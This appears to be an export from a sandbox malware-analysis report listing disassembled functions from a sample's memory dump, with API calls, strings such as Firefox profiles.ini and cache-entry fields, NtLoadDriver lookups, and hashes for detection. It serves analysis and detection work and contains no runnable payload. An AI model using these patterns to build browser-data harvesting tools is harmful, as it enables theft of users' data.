                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                              • SetCursor.USER32(00000000), ref: 0040129E
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                              • String ID:
                                                                              • API String ID: 829165378-0
                                                                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                              Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                              • memset.MSVCRT ref: 00404200
                                                                              • memset.MSVCRT ref: 00404215
                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 0040426E
                                                                              • memset.MSVCRT ref: 004042CD
                                                                              • memset.MSVCRT ref: 004042E2
                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                              • API String ID: 2454223109-1580313836
                                                                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                              Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                              • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                              • API String ID: 4054529287-3175352466
                                                                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                              Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                              • API String ID: 3143752011-1996832678
                                                                              • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                              • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                              Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                              • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                              • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                              • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                              • API String ID: 667068680-2887671607
                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                              Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                              • API String ID: 1607361635-601624466
                                                                              • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                              • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                              Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                              • API String ID: 2000436516-3842416460
                                                                              • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                              • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                              Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                              • String ID:
                                                                              • API String ID: 1043902810-0
                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                              • free.MSVCRT ref: 0040E49A
                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                              • memset.MSVCRT ref: 0040E380
                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                              • API String ID: 3849927982-2252543386
                                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                              Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                              • API String ID: 2899246560-1542517562
                                                                              • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                              • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004091E2
                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                              • memcmp.MSVCRT ref: 004092D9
                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                              • memcmp.MSVCRT ref: 0040933B
                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                              • memcmp.MSVCRT ref: 00409411
                                                                              • memcmp.MSVCRT ref: 00409429
                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                              • memcmp.MSVCRT ref: 004094AC
                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                              • String ID:
                                                                              • API String ID: 3715365532-3916222277
                                                                              • Opcode ID: 683302bc83f0c3b8efe37202e36ecfb2c28a75702c8a880ee355ae88e17874fd
                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                              • Opcode Fuzzy Hash: 683302bc83f0c3b8efe37202e36ecfb2c28a75702c8a880ee355ae88e17874fd
                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                              Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                              • API String ID: 3330709923-517860148
                                                                              • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                              • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                              Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                              • memset.MSVCRT ref: 0040806A
                                                                              • memset.MSVCRT ref: 0040807F
